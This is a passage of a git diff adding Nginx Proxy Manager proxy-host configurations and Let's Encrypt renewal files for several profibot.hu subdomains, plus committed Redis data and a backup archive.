conf.d/include/ssl-ciphers.conf; + ssl_certificate /etc/letsencrypt/live/npm-11/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/npm-11/privkey.pem; + + + + + + + + + + + + + # Force SSL + include conf.d/include/force-ssl.conf; + + + + + + access_log /data/logs/proxy-host-5_access.log proxy; + error_log /data/logs/proxy-host-5_error.log warn; + + + + + + + + location / { + + + + + + + + + + + + # Proxy! + include conf.d/include/proxy.conf; + } + + + # Custom + include /data/nginx/custom/server_proxy[.]conf; +} diff --git a/proxy-manager/data/nginx/proxy_host/6.conf b/proxy-manager/data/nginx/proxy_host/6.conf new file mode 100755 index 0000000..b157244 --- /dev/null +++ b/proxy-manager/data/nginx/proxy_host/6.conf @@ -0,0 +1,92 @@ +# ------------------------------------------------------------ +# nas.profibot.hu +# ------------------------------------------------------------ + + + +map $scheme $hsts_header { + https "max-age=63072000; preload"; +} + +server { + set $forward_scheme https; + set $server "192.168.100.30"; + set $port 5001; + + listen 80; +listen [::]:80; + +listen 443 ssl; +listen [::]:443 ssl; + + + server_name nas.profibot.hu; + + http2 on; + + + # Let's Encrypt SSL + include conf.d/include/letsencrypt-acme-challenge.conf; + include conf.d/include/ssl-cache.conf; + include conf.d/include/ssl-ciphers.conf; + ssl_certificate /etc/letsencrypt/live/npm-13/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/npm-13/privkey.pem; + + + + + + + # Block Exploits + include conf.d/include/block-exploits.conf; + + + + + + + + # Force SSL + include conf.d/include/force-ssl.conf; + + + + +proxy_set_header Upgrade $http_upgrade; +proxy_set_header Connection $http_connection; +proxy_http_version 1.1; + + + access_log /data/logs/proxy-host-6_access.log proxy; + error_log /data/logs/proxy-host-6_error.log warn; + + + + + + + + location / { + + + + + + + + + + + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection $http_connection; + proxy_http_version 1.1; + + + # Proxy! + include conf.d/include/proxy.conf; + } + + + # Custom + include /data/nginx/custom/server_proxy[.]conf; +} diff --git a/proxy-manager/data/nginx/proxy_host/7.conf b/proxy-manager/data/nginx/proxy_host/7.conf new file mode 100755 index 0000000..ca03798 --- /dev/null +++ b/proxy-manager/data/nginx/proxy_host/7.conf @@ -0,0 +1,59 @@ +# ------------------------------------------------------------ +# fimer.profibot.hu +# ------------------------------------------------------------ + + + +map $scheme $hsts_header { + https "max-age=63072000; preload"; +} + +server { + set $forward_scheme http; + set $server "192.168.100.6"; + set $port 80; + + listen 80; +listen [::]:80; + + + server_name fimer.profibot.hu; +http2 off; + + + + + + + + + + + + + access_log /data/logs/proxy-host-7_access.log proxy; + error_log /data/logs/proxy-host-7_error.log warn; + + + + + + + + location / { + + + + + + + + + # Proxy! + include conf.d/include/proxy.conf; + } + + + # Custom + include /data/nginx/custom/server_proxy[.]conf; +} diff --git a/proxy-manager/data/nginx/proxy_host/8.conf b/proxy-manager/data/nginx/proxy_host/8.conf new file mode 100755 index 0000000..2141c84 --- /dev/null +++ b/proxy-manager/data/nginx/proxy_host/8.conf @@ -0,0 +1,81 @@ +# ------------------------------------------------------------ +# code.profibot.hu +# ------------------------------------------------------------ + + + +map $scheme $hsts_header { + https "max-age=63072000; preload"; +} + +server { + set $forward_scheme http; + set $server "code-server"; + set $port 8080; + + listen 80; +listen [::]:80; + +listen 443 ssl; +listen [::]:443 ssl; + + + server_name code.profibot.hu; +http2 off; + + + # Let's Encrypt SSL + include conf.d/include/letsencrypt-acme-challenge.conf; + include conf.d/include/ssl-cache.conf; + include conf.d/include/ssl-ciphers.conf; + ssl_certificate /etc/letsencrypt/live/npm-15/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/npm-15/privkey.pem; + + + + + + + + + + + + + +proxy_set_header Upgrade $http_upgrade; +proxy_set_header Connection $http_connection; +proxy_http_version 1.1; + + + access_log /data/logs/proxy-host-8_access.log proxy; + error_log /data/logs/proxy-host-8_error.log warn; + + + + + + + + location / { + + + + + + + + + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection $http_connection; + proxy_http_version 1.1; + + + # Proxy! + include conf.d/include/proxy.conf; + } + + + # Custom + include /data/nginx/custom/server_proxy[.]conf; +} diff --git a/proxy-manager/data/nginx/proxy_host/9.conf b/proxy-manager/data/nginx/proxy_host/9.conf new file mode 100755 index 0000000..6c5a527 --- /dev/null +++ b/proxy-manager/data/nginx/proxy_host/9.conf @@ -0,0 +1,74 @@ +# ------------------------------------------------------------ +# app.profibot.hu +# ------------------------------------------------------------ + + + +map $scheme $hsts_header { + https "max-age=63072000; preload"; +} + +server { + set $forward_scheme http; + set $server "service_finder_frontend"; + set $port 80; + + listen 80; +listen [::]:80; + +listen 443 ssl; +listen [::]:443 ssl; + + + server_name app.profibot.hu; +http2 off; + + + # Let's Encrypt SSL + include conf.d/include/letsencrypt-acme-challenge.conf; + include conf.d/include/ssl-cache.conf; + include conf.d/include/ssl-ciphers.conf; + ssl_certificate /etc/letsencrypt/live/npm-16/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/npm-16/privkey.pem; + + + + + + + + + + + + + + + access_log /data/logs/proxy-host-9_access.log proxy; + error_log /data/logs/proxy-host-9_error.log warn; + + + + + + + + location / { + + + + + + + + + + # Proxy! + include conf.d/include/proxy.conf; + } + + + # Custom + include /data/nginx/custom/server_proxy[.]conf; +} + diff --git a/proxy-manager/letsencrypt/renewal/npm-11.conf b/proxy-manager/letsencrypt/renewal/npm-11.conf new file mode 100755 index 0000000..8bf38f1 --- /dev/null +++ b/proxy-manager/letsencrypt/renewal/npm-11.conf @@ -0,0 +1,20 @@ +version = 5.1.0 +archive_dir = /etc/letsencrypt/archive/npm-11 +cert = /etc/letsencrypt/live/npm-11/cert.pem +privkey = /etc/letsencrypt/live/npm-11/privkey.pem +chain = /etc/letsencrypt/live/npm-11/chain.pem +fullchain = /etc/letsencrypt/live/npm-11/fullchain.pem +[renewalparams] +account = e417a583de478a0cfdeed332c1113068 +key_type = ecdsa +elliptic_curve = secp384r1 +preferred_chain = ISRG Root X1 +pref_challs = http-01, +config_dir = /etc/letsencrypt +work_dir = /tmp/letsencrypt-lib +logs_dir = /data/logs +authenticator = webroot +webroot_path = /data/letsencrypt-acme-challenge, +server = https://acme-v02.api.letsencrypt.org/directory +[[webroot_map]] +profibot.synology.me = /data/letsencrypt-acme-challenge diff --git a/proxy-manager/letsencrypt/renewal/npm-13.conf b/proxy-manager/letsencrypt/renewal/npm-13.conf new file mode 100755 index 0000000..df1b866 --- /dev/null +++ b/proxy-manager/letsencrypt/renewal/npm-13.conf @@ -0,0 +1,20 @@ +version = 5.1.0 +archive_dir = /etc/letsencrypt/archive/npm-13 +cert = /etc/letsencrypt/live/npm-13/cert.pem +privkey = /etc/letsencrypt/live/npm-13/privkey.pem +chain = /etc/letsencrypt/live/npm-13/chain.pem +fullchain = /etc/letsencrypt/live/npm-13/fullchain.pem +[renewalparams] +account = e417a583de478a0cfdeed332c1113068 +key_type = ecdsa +elliptic_curve = secp384r1 +preferred_chain = ISRG Root X1 +pref_challs = http-01, +config_dir = /etc/letsencrypt +work_dir = /tmp/letsencrypt-lib +logs_dir = /data/logs +authenticator = webroot +webroot_path = /data/letsencrypt-acme-challenge, +server = https://acme-v02.api.letsencrypt.org/directory +[[webroot_map]] +nas.profibot.hu = /data/letsencrypt-acme-challenge diff --git a/proxy-manager/letsencrypt/renewal/npm-14.conf b/proxy-manager/letsencrypt/renewal/npm-14.conf new file mode 100755 index 0000000..f080b23 --- /dev/null +++ b/proxy-manager/letsencrypt/renewal/npm-14.conf @@ -0,0 +1,20 @@ +version = 5.1.0 +archive_dir = /etc/letsencrypt/archive/npm-14 +cert = /etc/letsencrypt/live/npm-14/cert.pem +privkey = /etc/letsencrypt/live/npm-14/privkey.pem +chain = /etc/letsencrypt/live/npm-14/chain.pem +fullchain = /etc/letsencrypt/live/npm-14/fullchain.pem +[renewalparams] +account = e417a583de478a0cfdeed332c1113068 +key_type = ecdsa +elliptic_curve = secp384r1 +preferred_chain = ISRG Root X1 +pref_challs = http-01, +config_dir = /etc/letsencrypt +work_dir = /tmp/letsencrypt-lib +logs_dir = /data/logs +authenticator = webroot +webroot_path = /data/letsencrypt-acme-challenge, +server = https://acme-v02.api.letsencrypt.org/directory +[[webroot_map]] +db.profibot.hu = /data/letsencrypt-acme-challenge diff --git a/proxy-manager/letsencrypt/renewal/npm-15.conf b/proxy-manager/letsencrypt/renewal/npm-15.conf new file mode 100755 index 0000000..31f6415 --- /dev/null +++ b/proxy-manager/letsencrypt/renewal/npm-15.conf @@ -0,0 +1,20 @@ +version = 5.1.0 +archive_dir = /etc/letsencrypt/archive/npm-15 +cert = /etc/letsencrypt/live/npm-15/cert.pem +privkey = /etc/letsencrypt/live/npm-15/privkey.pem +chain = /etc/letsencrypt/live/npm-15/chain.pem +fullchain = /etc/letsencrypt/live/npm-15/fullchain.pem +[renewalparams] +account = e417a583de478a0cfdeed332c1113068 +key_type = ecdsa +elliptic_curve = secp384r1 +preferred_chain = ISRG Root X1 +pref_challs = http-01, +config_dir = /etc/letsencrypt +work_dir = /tmp/letsencrypt-lib +logs_dir = /data/logs +authenticator = webroot +webroot_path = /data/letsencrypt-acme-challenge, +server = https://acme-v02.api.letsencrypt.org/directory +[[webroot_map]] +code.profibot.hu = /data/letsencrypt-acme-challenge diff --git a/proxy-manager/letsencrypt/renewal/npm-16.conf b/proxy-manager/letsencrypt/renewal/npm-16.conf new file mode 100755 index 0000000..2017235 --- /dev/null +++ b/proxy-manager/letsencrypt/renewal/npm-16.conf @@ -0,0 +1,20 @@ +version = 5.1.0 +archive_dir = /etc/letsencrypt/archive/npm-16 +cert = /etc/letsencrypt/live/npm-16/cert.pem +privkey = /etc/letsencrypt/live/npm-16/privkey.pem +chain = /etc/letsencrypt/live/npm-16/chain.pem +fullchain = /etc/letsencrypt/live/npm-16/fullchain.pem +[renewalparams] +account = e417a583de478a0cfdeed332c1113068 +key_type = ecdsa +elliptic_curve = secp384r1 +preferred_chain = ISRG Root X1 +pref_challs = http-01, +config_dir = /etc/letsencrypt +work_dir = /tmp/letsencrypt-lib +logs_dir = /data/logs +authenticator = webroot +webroot_path = /data/letsencrypt-acme-challenge, +server = https://acme-v02.api.letsencrypt.org/directory +[[webroot_map]] +app.profibot.hu = /data/letsencrypt-acme-challenge diff --git a/proxy-manager/letsencrypt/renewal/npm-18.conf b/proxy-manager/letsencrypt/renewal/npm-18.conf new file mode 100755 index 0000000..564aea0 --- /dev/null +++ b/proxy-manager/letsencrypt/renewal/npm-18.conf @@ -0,0 +1,20 @@ +version = 5.1.0 +archive_dir = /etc/letsencrypt/archive/npm-18 +cert = /etc/letsencrypt/live/npm-18/cert.pem +privkey = /etc/letsencrypt/live/npm-18/privkey.pem +chain = /etc/letsencrypt/live/npm-18/chain.pem +fullchain = /etc/letsencrypt/live/npm-18/fullchain.pem +[renewalparams] +account = e417a583de478a0cfdeed332c1113068 +key_type = ecdsa +elliptic_curve = secp384r1 +preferred_chain = ISRG Root X1 +pref_challs = http-01, +config_dir = /etc/letsencrypt +work_dir = /tmp/letsencrypt-lib +logs_dir = /data/logs +authenticator = webroot +webroot_path = /data/letsencrypt-acme-challenge, +server = https://acme-v02.api.letsencrypt.org/directory +[[webroot_map]] +terminal.profibot.hu = /data/letsencrypt-acme-challenge diff --git a/proxy-manager/letsencrypt/renewal/npm-19.conf b/proxy-manager/letsencrypt/renewal/npm-19.conf new file mode 100755 index 0000000..0d2c602 --- /dev/null +++ b/proxy-manager/letsencrypt/renewal/npm-19.conf @@ -0,0 +1,20 @@ +version = 5.1.0 +archive_dir = /etc/letsencrypt/archive/npm-19 +cert = /etc/letsencrypt/live/npm-19/cert.pem +privkey = /etc/letsencrypt/live/npm-19/privkey.pem +chain = /etc/letsencrypt/live/npm-19/chain.pem +fullchain = /etc/letsencrypt/live/npm-19/fullchain.pem +[renewalparams] +account = e417a583de478a0cfdeed332c1113068 +key_type = ecdsa +elliptic_curve = secp384r1 +preferred_chain = ISRG Root X1 +pref_challs = http-01, +config_dir = /etc/letsencrypt +work_dir = /tmp/letsencrypt-lib +logs_dir = /data/logs +authenticator = webroot +webroot_path = /data/letsencrypt-acme-challenge, +server = https://acme-v02.api.letsencrypt.org/directory +[[webroot_map]] +net.profibot.hu = /data/letsencrypt-acme-challenge diff --git a/proxy-manager/letsencrypt/renewal/npm-4.conf b/proxy-manager/letsencrypt/renewal/npm-4.conf new file mode 100755 index 0000000..ca285d7 --- /dev/null +++ b/proxy-manager/letsencrypt/renewal/npm-4.conf @@ -0,0 +1,20 @@ +version = 5.1.0 +archive_dir = /etc/letsencrypt/archive/npm-4 +cert = /etc/letsencrypt/live/npm-4/cert.pem +privkey = /etc/letsencrypt/live/npm-4/privkey.pem +chain = /etc/letsencrypt/live/npm-4/chain.pem +fullchain = /etc/letsencrypt/live/npm-4/fullchain.pem +[renewalparams] +account = e417a583de478a0cfdeed332c1113068 +key_type = ecdsa +elliptic_curve = secp384r1 +preferred_chain = ISRG Root X1 +pref_challs = http-01, +config_dir = /etc/letsencrypt +work_dir = /tmp/letsencrypt-lib +logs_dir = /data/logs +authenticator = webroot +webroot_path = /data/letsencrypt-acme-challenge, +server = https://acme-v02.api.letsencrypt.org/directory +[[webroot_map]] +dev.profibot.hu = /data/letsencrypt-acme-challenge diff --git a/proxy-manager/letsencrypt/renewal/npm-5.conf b/proxy-manager/letsencrypt/renewal/npm-5.conf new file mode 100755 index 0000000..199040e --- /dev/null +++ b/proxy-manager/letsencrypt/renewal/npm-5.conf @@ -0,0 +1,20 @@ +version = 5.1.0 +archive_dir = /etc/letsencrypt/archive/npm-5 +cert = /etc/letsencrypt/live/npm-5/cert.pem +privkey = /etc/letsencrypt/live/npm-5/privkey.pem +chain = /etc/letsencrypt/live/npm-5/chain.pem +fullchain = /etc/letsencrypt/live/npm-5/fullchain.pem +[renewalparams] +account = e417a583de478a0cfdeed332c1113068 +key_type = ecdsa +elliptic_curve = secp384r1 +preferred_chain = ISRG Root X1 +pref_challs = http-01, +config_dir = /etc/letsencrypt +work_dir = /tmp/letsencrypt-lib +logs_dir = /data/logs +authenticator = webroot +webroot_path = /data/letsencrypt-acme-challenge, +server = https://acme-v02.api.letsencrypt.org/directory +[[webroot_map]] +targetts.ddns.net = /data/letsencrypt-acme-challenge diff --git a/proxy-manager/proxy_backup.tar.gz b/proxy-manager/proxy_backup.tar.gz new file mode 100755 index 0000000..f31e0f1 Binary files /dev/null and b/proxy-manager/proxy_backup.tar.gz differ diff --git a/redis/data/appendonlydir/appendonly.aof.1.base.rdb b/redis/data/appendonlydir/appendonly.aof.1.base.rdb new file mode 100755 index 0000000..d22135a Binary files /dev/null and b/redis/data/appendonlydir/appendonly.aof.1.base.rdb differ diff --git a/redis/data/appendonlydir/appendonly.aof.1.incr.aof b/redis/data/appendonlydir/appendonly.aof.1.incr.aof new file mode 100755 index 0000000..e69de29 diff --git a/redis/data/appendonlydir/appendonly.aof.manifest b/redis/data/appendonlydir/appendonly.aof.manifest new file mode 100755 index 0000000..7f8bb72 --- /dev/null +++ b/redis/data/appendonlydir/appendonly.aof.manifest @@ -0,0 +1,2 @@ +file appendonly.aof.1.base.rdb seq 1 type b +file appendonly.aof.1.incr.aof seq 1 type i diff --git a/redis/data/dump.rdb b/redis/data/dump.rdb new file mode 100755 index 0000000..ef896db Binary files /dev/null and b/redis/data/dump.rdb differ